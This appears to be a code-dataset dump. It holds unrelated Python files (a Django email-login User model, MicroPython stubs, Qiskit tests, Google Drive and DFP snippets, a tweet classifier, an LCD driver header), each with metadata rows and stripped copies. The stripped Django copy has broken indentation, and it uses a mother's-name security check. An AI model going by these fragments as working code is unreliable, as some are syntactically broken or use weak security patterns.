        # are assumed to come from a project-specific mixin, so fall back gracefully
        # instead of calling a method the base class does not define.
        mother_name = getattr(self, 'mother_name', None)
        if mother_name:
            return mother_name
        return getattr(self, 'mother', None)
    def validate_unique(self, exclude=None):
        """
        Since the email address is used as the primary identifier, we must ensure that it is
        unique. However, since this constraint only applies to active users, it can't be done
        through a field declaration via a database UNIQUE index.
        Inactive users can't log in anyway, so we don't need a unique constraint for them.
        """
        super(User, self).validate_unique(exclude)
        if self.email and get_user_model().objects.exclude(id=self.id).filter(is_active=True,
                                                                              email__exact=self.email).exists():
            msg = _("A customer with the e-mail address ‘{email}’ already exists.")
            raise ValidationError({'email': msg.format(email=self.email)})
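# Validation sketch (hypothetical objects): saving a second *active* user with an
# already-used email is rejected during model validation.
#
#     user = User(username='second', email='customer@example.com', is_active=True)
#     user.full_clean()   # raises ValidationError if an active user has this email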
| 40.469136
| 112
| 0.672971
|
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AbstractUser, UserManager as BaseUserManager
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
class UserManager(BaseUserManager):
def get_by_natural_key(self, username):
try:
return self.get(username=username)
except self.model.DoesNotExist:
return self.get(is_active=True, email=username)
class User(AbstractUser):
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
class Meta:
db_table = 'auth_user'
verbose_name = _("Customer")
verbose_name_plural = _("Customers")
swappable = 'AUTH_USER_MODEL'
def get_username(self):
return self.email
def __str__(self):
if self.is_staff or self.is_superuser:
return self.username
return self.email or '<anonymous>'
def get_full_name(self):
full_name = super(User, self).get_full_name()
if full_name:
return full_name
return self.get_short_name()
def get_short_name(self):
short_name = super(User, self).get_short_name()
if short_name:
return short_name
return self.email
    def get_security_check(self):
        mother_name = getattr(self, 'mother_name', None)
        if mother_name:
            return mother_name
        return getattr(self, 'mother', None)
def validate_unique(self, exclude=None):
        super(User, self).validate_unique(exclude)
        if self.email and get_user_model().objects.exclude(id=self.id).filter(is_active=True,
                                                                              email__exact=self.email).exists():
            msg = _("A customer with the e-mail address ‘{email}’ already exists.")
            raise ValidationError({'email': msg.format(email=self.email)})
| true
| true
|
1c4478cf27279c1b3b6d9d53a0f12f63325505c6
| 711
|
py
|
Python
|
stubs/micropython-v1_12-esp32/urandom.py
|
mattytrentini/micropython-stubs
|
4d596273823b69e9e5bcf5fa67f249c374ee0bbc
|
[
"MIT"
] | null | null | null |
stubs/micropython-v1_12-esp32/urandom.py
|
mattytrentini/micropython-stubs
|
4d596273823b69e9e5bcf5fa67f249c374ee0bbc
|
[
"MIT"
] | null | null | null |
stubs/micropython-v1_12-esp32/urandom.py
|
mattytrentini/micropython-stubs
|
4d596273823b69e9e5bcf5fa67f249c374ee0bbc
|
[
"MIT"
] | null | null | null |
"""
Module: 'urandom' on micropython-v1.12-esp32
"""
# MCU: {'ver': 'v1.12', 'port': 'esp32', 'arch': 'xtensawin', 'sysname': 'esp32', 'release': '1.12.0', 'name': 'micropython', 'mpy': 10757, 'version': '1.12.0', 'machine': 'ESP32 module (spiram) with ESP32', 'build': '', 'nodename': 'esp32', 'platform': 'esp32', 'family': 'micropython'}
# Stubber: 1.5.4
from typing import Any
def choice(*args, **kwargs) -> Any:
...
def getrandbits(*args, **kwargs) -> Any:
...
def randint(*args, **kwargs) -> Any:
...
def random(*args, **kwargs) -> Any:
...
def randrange(*args, **kwargs) -> Any:
...
def seed(*args, **kwargs) -> Any:
...
def uniform(*args, **kwargs) -> Any:
...
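# Usage sketch on an actual board (the stubs above only describe the signatures;
# on-device the functions behave like their CPython `random` counterparts):
#
#     import urandom
#     urandom.seed(1234)
#     urandom.getrandbits(8)        # integer in 0..255
#     urandom.randint(1, 6)         # die roll
#     urandom.choice(['a', 'b'])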
| 20.314286
| 287
| 0.556962
|
from typing import Any
def choice(*args, **kwargs) -> Any:
...
def getrandbits(*args, **kwargs) -> Any:
...
def randint(*args, **kwargs) -> Any:
...
def random(*args, **kwargs) -> Any:
...
def randrange(*args, **kwargs) -> Any:
...
def seed(*args, **kwargs) -> Any:
...
def uniform(*args, **kwargs) -> Any:
...
| true
| true
|
1c4478e8f37c4dcc3ce6658c1bbadfe574f5833e
| 597
|
py
|
Python
|
Ch_7_Mangle Data Like a Pro/demo_of_re_findall.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | 1
|
2020-07-21T08:34:08.000Z
|
2020-07-21T08:34:08.000Z
|
Ch_7_Mangle Data Like a Pro/demo_of_re_findall.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
Ch_7_Mangle Data Like a Pro/demo_of_re_findall.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
import re
source = 'Young Frankenstein'
m = re.findall('n', source)
if m:
# Found 4 matches
# ['n', 'n', 'n', 'n']
print(f'Found {len(m)} matches')
print( m )
# ---------------------------------
source = 'Young Frankenstein'
m = re.findall('n.', source)
if m:
# Found 3 matches
# ['ng', 'nk', 'ns']
print(f'Found {len(m)} matches')
print( m )
# ----------------------------------
source = 'Young Frankenstein'
m = re.findall('n.?', source)
if m:
# Found 4 matches
# ['ng', 'nk', 'ns', 'n']
print(f'Found {len(m)} matches')
print( m )
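# ----------------------------------
# A further variation (not in the original demo): the non-greedy quantifier
# '.*?' stops at the first following 'n'.
source = 'Young Frankenstein'
m = re.findall('n.*?n', source)
if m:
    # Found 2 matches
    # ['ng Fran', 'nstein']
    print(f'Found {len(m)} matches')
    print( m )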
| 18.65625
| 36
| 0.463987
|
import re
source = 'Young Frankenstein'
m = re.findall('n', source)
if m:
print(f'Found {len(m)} matches')
print( m )
source = 'Young Frankenstein'
m = re.findall('n.', source)
if m:
print(f'Found {len(m)} matches')
print( m )
source = 'Young Frankenstein'
m = re.findall('n.?', source)
if m:
print(f'Found {len(m)} matches')
print( m )
| true
| true
|
1c4479a1081509e9c8cd3fe5ea7ce84bc8532189
| 6,919
|
py
|
Python
|
test/drivers/gaussiand/test_driver_gaussian_log.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | 1
|
2021-06-20T15:31:01.000Z
|
2021-06-20T15:31:01.000Z
|
test/drivers/gaussiand/test_driver_gaussian_log.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | 1
|
2021-08-25T13:31:41.000Z
|
2021-08-25T13:31:41.000Z
|
test/drivers/gaussiand/test_driver_gaussian_log.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | 3
|
2021-07-02T06:57:58.000Z
|
2021-07-06T12:32:38.000Z
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Gaussian Log Driver """
import unittest
from test import QiskitNatureTestCase
from qiskit_nature.drivers import GaussianLogDriver, GaussianLogResult
from qiskit_nature import QiskitNatureError
class TestDriverGaussianLog(QiskitNatureTestCase):
"""Gaussian Log Driver tests."""
def setUp(self):
super().setUp()
self.logfile = self.get_resource_path(
"test_driver_gaussian_log.txt", "drivers/second_quantization/gaussiand"
)
def test_log_driver(self):
"""Test the driver itself creates log and we can get a result"""
try:
driver = GaussianLogDriver(
[
"#p B3LYP/6-31g Freq=(Anharm) Int=Ultrafine SCF=VeryTight",
"",
"CO2 geometry optimization B3LYP/cc-pVTZ",
"",
"0 1",
"C -0.848629 2.067624 0.160992",
"O 0.098816 2.655801 -0.159738",
"O -1.796073 1.479446 0.481721",
"",
"",
]
)
result = driver.run()
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
except QiskitNatureError:
self.skipTest("GAUSSIAN driver does not appear to be installed")
# These tests check the gaussian log result and the parsing from a partial log file that is
# located with the tests so that this aspect of the code can be tested independent of
# Gaussian 16 being installed.
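    # Minimal illustration of that independence (a sketch): a result can be built
    # directly from text, with no Gaussian installation required.
    #
    #     result = GaussianLogResult('line one\nline two')
    #     result.log == ['line one', 'line two']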
def test_gaussian_log_result_file(self):
"""Test result from file"""
result = GaussianLogResult(self.logfile)
with open(self.logfile) as file:
lines = file.read().split("\n")
with self.subTest("Check list of lines"):
self.assertListEqual(result.log, lines)
with self.subTest("Check as string"):
line = "\n".join(lines)
self.assertEqual(str(result), line)
def test_gaussian_log_result_list(self):
"""Test result from list of strings"""
with open(self.logfile) as file:
lines = file.read().split("\n")
result = GaussianLogResult(lines)
self.assertListEqual(result.log, lines)
def test_gaussian_log_result_string(self):
"""Test result from string"""
with open(self.logfile) as file:
line = file.read()
result = GaussianLogResult(line)
self.assertListEqual(result.log, line.split("\n"))
def test_quadratic_force_constants(self):
"""Test quadratic force constants"""
result = GaussianLogResult(self.logfile)
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
def test_cubic_force_constants(self):
"""Test cubic force constants"""
result = GaussianLogResult(self.logfile)
cfc = result.cubic_force_constants
expected = [
("1", "1", "1", -260.36071, -1.39757, -0.0475),
("2", "2", "1", -498.9444, -4.80163, -0.1632),
("3a", "3a", "1", 239.87769, 0.4227, 0.01437),
("3a", "3b", "1", 74.25095, 0.13084, 0.00445),
("3b", "3b", "1", 12.93985, 0.0228, 0.00078),
]
self.assertListEqual(cfc, expected)
def test_quartic_force_constants(self):
"""Test quartic force constants"""
result = GaussianLogResult(self.logfile)
qfc = result.quartic_force_constants
expected = [
("1", "1", "1", "1", 40.39063, 1.40169, 0.02521),
("2", "2", "1", "1", 79.08068, 4.92017, 0.0885),
("2", "2", "2", "2", 154.78015, 17.26491, 0.31053),
("3a", "3a", "1", "1", -67.10879, -0.76453, -0.01375),
("3b", "3b", "1", "1", -67.10879, -0.76453, -0.01375),
("3a", "3a", "2", "2", -163.29426, -3.33524, -0.05999),
("3b", "3b", "2", "2", -163.29426, -3.33524, -0.05999),
("3a", "3a", "3a", "3a", 220.54851, 0.82484, 0.01484),
("3a", "3a", "3a", "3b", 66.77089, 0.24972, 0.00449),
("3a", "3a", "3b", "3b", 117.26759, 0.43857, 0.00789),
("3a", "3b", "3b", "3b", -66.77088, -0.24972, -0.00449),
("3b", "3b", "3b", "3b", 220.54851, 0.82484, 0.01484),
]
self.assertListEqual(qfc, expected)
def test_watson_hamiltonian(self):
"""Test the watson hamiltonian"""
result = GaussianLogResult(self.logfile)
watson = result.get_watson_hamiltonian()
expected = [
[352.3005875, 2, 2],
[-352.3005875, -2, -2],
[631.6153975, 1, 1],
[-631.6153975, -1, -1],
[115.653915, 4, 4],
[-115.653915, -4, -4],
[115.653915, 3, 3],
[-115.653915, -3, -3],
[-15.341901966295344, 2, 2, 2],
[-88.2017421687633, 1, 1, 2],
[42.40478531359112, 4, 4, 2],
[26.25167512727164, 4, 3, 2],
[2.2874639206341865, 3, 3, 2],
[0.4207357291666667, 2, 2, 2, 2],
[4.9425425, 1, 1, 2, 2],
[1.6122932291666665, 1, 1, 1, 1],
[-4.194299375, 4, 4, 2, 2],
[-4.194299375, 3, 3, 2, 2],
[-10.20589125, 4, 4, 1, 1],
[-10.20589125, 3, 3, 1, 1],
[2.2973803125, 4, 4, 4, 4],
[2.7821204166666664, 4, 4, 4, 3],
[7.329224375, 4, 4, 3, 3],
[-2.7821200000000004, 4, 3, 3, 3],
[2.2973803125, 3, 3, 3, 3],
]
for i, entry in enumerate(watson.data):
msg = "mode[{}]={} does not match expected {}".format(i, entry, expected[i])
self.assertAlmostEqual(entry[0], expected[i][0], msg=msg)
self.assertListEqual(entry[1:], expected[i][1:], msg=msg)
if __name__ == "__main__":
unittest.main()
| 39.3125
| 95
| 0.533459
|
import unittest
from test import QiskitNatureTestCase
from qiskit_nature.drivers import GaussianLogDriver, GaussianLogResult
from qiskit_nature import QiskitNatureError
class TestDriverGaussianLog(QiskitNatureTestCase):
def setUp(self):
super().setUp()
self.logfile = self.get_resource_path(
"test_driver_gaussian_log.txt", "drivers/second_quantization/gaussiand"
)
def test_log_driver(self):
try:
driver = GaussianLogDriver(
[
"#p B3LYP/6-31g Freq=(Anharm) Int=Ultrafine SCF=VeryTight",
"",
"CO2 geometry optimization B3LYP/cc-pVTZ",
"",
"0 1",
"C -0.848629 2.067624 0.160992",
"O 0.098816 2.655801 -0.159738",
"O -1.796073 1.479446 0.481721",
"",
"",
]
)
result = driver.run()
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
except QiskitNatureError:
self.skipTest("GAUSSIAN driver does not appear to be installed")
def test_gaussian_log_result_file(self):
result = GaussianLogResult(self.logfile)
with open(self.logfile) as file:
lines = file.read().split("\n")
with self.subTest("Check list of lines"):
self.assertListEqual(result.log, lines)
with self.subTest("Check as string"):
line = "\n".join(lines)
self.assertEqual(str(result), line)
def test_gaussian_log_result_list(self):
with open(self.logfile) as file:
lines = file.read().split("\n")
result = GaussianLogResult(lines)
self.assertListEqual(result.log, lines)
def test_gaussian_log_result_string(self):
with open(self.logfile) as file:
line = file.read()
result = GaussianLogResult(line)
self.assertListEqual(result.log, line.split("\n"))
def test_quadratic_force_constants(self):
result = GaussianLogResult(self.logfile)
qfc = result.quadratic_force_constants
expected = [
("1", "1", 1409.20235, 1.17003, 0.07515),
("2", "2", 2526.46159, 3.76076, 0.24156),
("3a", "3a", 462.61566, 0.12609, 0.0081),
("3b", "3b", 462.61566, 0.12609, 0.0081),
]
self.assertListEqual(qfc, expected)
def test_cubic_force_constants(self):
result = GaussianLogResult(self.logfile)
cfc = result.cubic_force_constants
expected = [
("1", "1", "1", -260.36071, -1.39757, -0.0475),
("2", "2", "1", -498.9444, -4.80163, -0.1632),
("3a", "3a", "1", 239.87769, 0.4227, 0.01437),
("3a", "3b", "1", 74.25095, 0.13084, 0.00445),
("3b", "3b", "1", 12.93985, 0.0228, 0.00078),
]
self.assertListEqual(cfc, expected)
def test_quartic_force_constants(self):
result = GaussianLogResult(self.logfile)
qfc = result.quartic_force_constants
expected = [
("1", "1", "1", "1", 40.39063, 1.40169, 0.02521),
("2", "2", "1", "1", 79.08068, 4.92017, 0.0885),
("2", "2", "2", "2", 154.78015, 17.26491, 0.31053),
("3a", "3a", "1", "1", -67.10879, -0.76453, -0.01375),
("3b", "3b", "1", "1", -67.10879, -0.76453, -0.01375),
("3a", "3a", "2", "2", -163.29426, -3.33524, -0.05999),
("3b", "3b", "2", "2", -163.29426, -3.33524, -0.05999),
("3a", "3a", "3a", "3a", 220.54851, 0.82484, 0.01484),
("3a", "3a", "3a", "3b", 66.77089, 0.24972, 0.00449),
("3a", "3a", "3b", "3b", 117.26759, 0.43857, 0.00789),
("3a", "3b", "3b", "3b", -66.77088, -0.24972, -0.00449),
("3b", "3b", "3b", "3b", 220.54851, 0.82484, 0.01484),
]
self.assertListEqual(qfc, expected)
def test_watson_hamiltonian(self):
result = GaussianLogResult(self.logfile)
watson = result.get_watson_hamiltonian()
expected = [
[352.3005875, 2, 2],
[-352.3005875, -2, -2],
[631.6153975, 1, 1],
[-631.6153975, -1, -1],
[115.653915, 4, 4],
[-115.653915, -4, -4],
[115.653915, 3, 3],
[-115.653915, -3, -3],
[-15.341901966295344, 2, 2, 2],
[-88.2017421687633, 1, 1, 2],
[42.40478531359112, 4, 4, 2],
[26.25167512727164, 4, 3, 2],
[2.2874639206341865, 3, 3, 2],
[0.4207357291666667, 2, 2, 2, 2],
[4.9425425, 1, 1, 2, 2],
[1.6122932291666665, 1, 1, 1, 1],
[-4.194299375, 4, 4, 2, 2],
[-4.194299375, 3, 3, 2, 2],
[-10.20589125, 4, 4, 1, 1],
[-10.20589125, 3, 3, 1, 1],
[2.2973803125, 4, 4, 4, 4],
[2.7821204166666664, 4, 4, 4, 3],
[7.329224375, 4, 4, 3, 3],
[-2.7821200000000004, 4, 3, 3, 3],
[2.2973803125, 3, 3, 3, 3],
]
for i, entry in enumerate(watson.data):
msg = "mode[{}]={} does not match expected {}".format(i, entry, expected[i])
self.assertAlmostEqual(entry[0], expected[i][0], msg=msg)
self.assertListEqual(entry[1:], expected[i][1:], msg=msg)
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c447a30344894966ddbd67d7e8299c130481086
| 391
|
py
|
Python
|
mediaman/services/drive/experiments/serviceaccounttest.py
|
MattCCS/MediaMan
|
388c0d16da437b0ede4f0903a01e41dc8e927ae6
|
[
"BSD-3-Clause-Clear"
] | 1
|
2019-05-06T19:51:08.000Z
|
2019-05-06T19:51:08.000Z
|
mediaman/services/drive/experiments/serviceaccounttest.py
|
MattCCS/MediaMan
|
388c0d16da437b0ede4f0903a01e41dc8e927ae6
|
[
"BSD-3-Clause-Clear"
] | 1
|
2021-02-08T20:22:34.000Z
|
2021-02-08T20:22:34.000Z
|
mediaman/services/drive/experiments/serviceaccounttest.py
|
MattCCS/MediaMan
|
388c0d16da437b0ede4f0903a01e41dc8e927ae6
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# service account basic example
from googleapiclient.discovery import build
from googleapiclient.http import MediaFileUpload
# Credentials are resolved from the environment (e.g. GOOGLE_APPLICATION_CREDENTIALS
# pointing at a service-account JSON key file).
drive = build("drive", "v3")
drive.files().list().execute()
file_metadata = {'name': 'test.txt'}
media = MediaFileUpload("test.txt")
file_receipt = drive.files().create(body=file_metadata, media_body=media, fields="id").execute()
file_receipt
drive.files().list().execute()
| 27.928571
| 96
| 0.757033
|
from googleapiclient.discovery import build
from googleapiclient.http import MediaFileUpload
drive = build("drive", "v3")
drive.files().list().execute()
file_metadata = {'name': 'test.txt'}
media = MediaFileUpload("test.txt")
file_receipt = drive.files().create(body=file_metadata, media_body=media, fields="id").execute()
file_receipt
drive.files().list().execute()
| true
| true
|
1c447aa8d452648be1850d869567b6b283f8f840
| 681
|
py
|
Python
|
tests_integration/helpers/archive_order_by_name.py
|
kmjennison/dfp-prebid-setup
|
d965f9a70e56a8444ecd80566028f09964b51d04
|
[
"MIT"
] | 111
|
2017-03-09T02:05:25.000Z
|
2022-03-14T21:03:00.000Z
|
tests_integration/helpers/archive_order_by_name.py
|
kmjennison/dfp-prebid-setup
|
d965f9a70e56a8444ecd80566028f09964b51d04
|
[
"MIT"
] | 81
|
2017-03-10T08:07:02.000Z
|
2022-03-02T04:44:06.000Z
|
tests_integration/helpers/archive_order_by_name.py
|
kmjennison/dfp-prebid-setup
|
d965f9a70e56a8444ecd80566028f09964b51d04
|
[
"MIT"
] | 87
|
2017-03-16T21:38:53.000Z
|
2022-02-04T11:48:29.000Z
|
#!/usr/bin/env python
import logging
from googleads import ad_manager
from dfp.client import get_client
# from tests_integration.helpers.get_order_by_name import get_order_by_name
def archive_order_by_name(order_name):
"""
Archives an order by name in DFP.
Args:
order_name (str): the name of the DFP order to archive
Returns:
None
"""
client = get_client()
order_service = client.GetService('OrderService', version='v202108')
statement = (ad_manager.StatementBuilder()
.Where('name = :name')
.WithBindVariable('name', order_name))
response = order_service.performOrderAction(
{'xsi_type': 'ArchiveOrders'},
statement.ToStatement())
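# Usage sketch (hypothetical order name; assumes valid Ad Manager credentials
# configured for get_client(), e.g. in googleads.yaml):
#
#     archive_order_by_name('Prebid test order')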
| 24.321429
| 75
| 0.734214
|
import logging
from googleads import ad_manager
from dfp.client import get_client
def archive_order_by_name(order_name):
client = get_client()
order_service = client.GetService('OrderService', version='v202108')
statement = (ad_manager.StatementBuilder()
.Where('name = :name')
.WithBindVariable('name', order_name))
response = order_service.performOrderAction(
{'xsi_type': 'ArchiveOrders'},
statement.ToStatement())
| true
| true
|
1c447be720a241ddbbc7be776decca7269ad922b
| 3,708
|
py
|
Python
|
scripts/classifier.py
|
michaelhalim168/GiftFinder
|
7fda99be827a06e5ef2d112174ded93ad1d3b7b1
|
[
"MIT"
] | null | null | null |
scripts/classifier.py
|
michaelhalim168/GiftFinder
|
7fda99be827a06e5ef2d112174ded93ad1d3b7b1
|
[
"MIT"
] | null | null | null |
scripts/classifier.py
|
michaelhalim168/GiftFinder
|
7fda99be827a06e5ef2d112174ded93ad1d3b7b1
|
[
"MIT"
] | 1
|
2021-08-02T07:49:01.000Z
|
2021-08-02T07:49:01.000Z
|
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
from sklearn.preprocessing import LabelEncoder
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from data_cleaning import *
class OVR_SVC:
def __init__(self, data):
self.X = data['clean-text']
self.y = data['category']
le = LabelEncoder()
self.y = le.fit_transform(self.y)
        self.reference = dict(zip(data['category'].to_numpy(), self.y))
self.reference = {k:v for k,v in sorted(self.reference.items(), key=lambda item: item[1])}
self.model = OneVsRestClassifier(LinearSVC(random_state=0))
self.x_train, self.x_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.3)
def vectorizer(self, type='tfidf'):
if type == 'tfidf':
vectorizer = TfidfVectorizer()
elif type == 'count':
vectorizer = CountVectorizer()
self.x_train = vectorizer.fit_transform(self.x_train)
self.x_test = vectorizer.transform(self.x_test)
def train_model(self):
self.model.fit(self.x_train, self.y_train)
def evaluate_model(self):
y_predicted = self.model.predict(self.x_test)
accuracy = self.model.score(self.x_test, self.y_test)
return y_predicted, accuracy
class TweetCategory:
def __init__(self, model, vectorizer, tweet_data, reference):
self.data = tweet_data
self.model = model
self.vectorizer = vectorizer
self.ref = reference
self.analyzer = SentimentIntensityAnalyzer()
def process_user_tweets(self):
self.data['clean-tweet'] = self.data['Tweet Content'].map(tweet_preprocess)
self.data = self.data[['Tweet Content', 'clean-tweet']].rename(columns={'Tweet Content': 'tweet'})
self.data['vader-sentiment'] = self.data['tweet'].apply(lambda x: self.analyzer.polarity_scores(x))
self.data['vader-pos'] = self.data['vader-sentiment'].apply(lambda x: x['pos'])
self.data['vader-neu'] = self.data['vader-sentiment'].apply(lambda x: x['neu'])
self.data['vader-neg'] = self.data['vader-sentiment'].apply(lambda x: x['neg'])
self.data['vader-compound'] = self.data['vader-sentiment'].apply(lambda x: x['compound'])
def predict_topics(self, sentiment_thresh, confidence_thresh):
        self.predict_df = self.data[(self.data['vader-compound'] >= sentiment_thresh) & (self.data['clean-tweet'] != '')].copy()
tweets_transformed = self.vectorizer.transform(self.predict_df['clean-tweet'])
predicted_category = self.model.predict(tweets_transformed)
p = np.array(self.model.decision_function(tweets_transformed))
probability = np.exp(p)/np.sum(np.exp(p), axis=1, keepdims=True)
probability_list = [max(prob) for prob in probability]
self.predict_df['predicted_label'] = predicted_category
self.predict_df['probability'] = probability_list
self.predict_df['predicted'] = self.predict_df['predicted_label'].apply(lambda x: self.ref[x])
top_categories = self.predict_df[self.predict_df['probability'] >= confidence_thresh]['predicted'].value_counts()[:3]
return top_categories
def user_tweet_df(tweets):
all_tweets = []
username = tweets[0]._json['user']['screen_name']
for tweet in tweets:
all_tweets.append(tweet._json['full_text'])
df = pd.DataFrame({'user': username, 'Tweet Content': all_tweets})
return df
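# End-to-end sketch (hypothetical file/variable names): train the classifier on a
# labeled frame with 'clean-text' and 'category' columns, then evaluate it.
#
#     data = pd.read_csv('labeled_tweets.csv')
#     clf = OVR_SVC(data)
#     clf.vectorizer(type='tfidf')
#     clf.train_model()
#     _, accuracy = clf.evaluate_model()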
| 41.2
| 132
| 0.677994
|
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
from sklearn.preprocessing import LabelEncoder
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from data_cleaning import *
class OVR_SVC:
def __init__(self, data):
self.X = data['clean-text']
self.y = data['category']
le = LabelEncoder()
self.y = le.fit_transform(self.y)
        self.reference = dict(zip(data['category'].to_numpy(), self.y))
self.reference = {k:v for k,v in sorted(self.reference.items(), key=lambda item: item[1])}
self.model = OneVsRestClassifier(LinearSVC(random_state=0))
self.x_train, self.x_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.3)
def vectorizer(self, type='tfidf'):
if type == 'tfidf':
vectorizer = TfidfVectorizer()
elif type == 'count':
vectorizer = CountVectorizer()
self.x_train = vectorizer.fit_transform(self.x_train)
self.x_test = vectorizer.transform(self.x_test)
def train_model(self):
self.model.fit(self.x_train, self.y_train)
def evaluate_model(self):
y_predicted = self.model.predict(self.x_test)
accuracy = self.model.score(self.x_test, self.y_test)
return y_predicted, accuracy
class TweetCategory:
def __init__(self, model, vectorizer, tweet_data, reference):
self.data = tweet_data
self.model = model
self.vectorizer = vectorizer
self.ref = reference
self.analyzer = SentimentIntensityAnalyzer()
def process_user_tweets(self):
self.data['clean-tweet'] = self.data['Tweet Content'].map(tweet_preprocess)
self.data = self.data[['Tweet Content', 'clean-tweet']].rename(columns={'Tweet Content': 'tweet'})
self.data['vader-sentiment'] = self.data['tweet'].apply(lambda x: self.analyzer.polarity_scores(x))
self.data['vader-pos'] = self.data['vader-sentiment'].apply(lambda x: x['pos'])
self.data['vader-neu'] = self.data['vader-sentiment'].apply(lambda x: x['neu'])
self.data['vader-neg'] = self.data['vader-sentiment'].apply(lambda x: x['neg'])
self.data['vader-compound'] = self.data['vader-sentiment'].apply(lambda x: x['compound'])
def predict_topics(self, sentiment_thresh, confidence_thresh):
        self.predict_df = self.data[(self.data['vader-compound'] >= sentiment_thresh) & (self.data['clean-tweet'] != '')].copy()
tweets_transformed = self.vectorizer.transform(self.predict_df['clean-tweet'])
predicted_category = self.model.predict(tweets_transformed)
p = np.array(self.model.decision_function(tweets_transformed))
probability = np.exp(p)/np.sum(np.exp(p), axis=1, keepdims=True)
probability_list = [max(prob) for prob in probability]
self.predict_df['predicted_label'] = predicted_category
self.predict_df['probability'] = probability_list
self.predict_df['predicted'] = self.predict_df['predicted_label'].apply(lambda x: self.ref[x])
top_categories = self.predict_df[self.predict_df['probability'] >= confidence_thresh]['predicted'].value_counts()[:3]
return top_categories
def user_tweet_df(tweets):
all_tweets = []
username = tweets[0]._json['user']['screen_name']
for tweet in tweets:
all_tweets.append(tweet._json['full_text'])
df = pd.DataFrame({'user': username, 'Tweet Content': all_tweets})
return df
| true
| true
|
1c447ccae06de96876bb5c45dbe5c87ce36a611e
| 11,319
|
py
|
Python
|
RPLCD/i2c.py
|
sphh/RPLCD
|
c4dc451623da5e02292046388be5201cbc25321e
|
[
"MIT"
] | 2
|
2020-09-06T17:05:06.000Z
|
2021-03-04T14:41:37.000Z
|
RPLCD/i2c.py
|
sphh/RPLCD
|
c4dc451623da5e02292046388be5201cbc25321e
|
[
"MIT"
] | 6
|
2018-03-13T18:41:29.000Z
|
2020-08-29T11:41:52.000Z
|
RPLCD/i2c.py
|
sphh/RPLCD
|
c4dc451623da5e02292046388be5201cbc25321e
|
[
"MIT"
] | 2
|
2020-08-05T04:01:34.000Z
|
2020-08-09T15:12:23.000Z
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2013-2017 Danilo Bargen
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import print_function, division, absolute_import, unicode_literals
from smbus import SMBus
from . import common as c
from .lcd import BaseCharLCD
# PCF8574 backlight control
PCF8574_BACKLIGHT = 0x08
PCF8574_NOBACKLIGHT = 0x00
# PCF8574 Pin bitmasks
PCF8574_E = 0x4
PIN_READ_WRITE = 0x2 # Not used?
PIN_REGISTER_SELECT = 0x1 # Not used?
# MCP230XX backlight control
MCP230XX_BACKLIGHT = 0x80
MCP230XX_NOBACKLIGHT = 0x7f
# MCP230XX pin bitmasks and datamask
MCP230XX_RS = 0x02
MCP230XX_E = 0x4
MCP230XX_DATAMASK = 0x78
MCP230XX_DATASHIFT = 3
# MCP23008 Register addresses
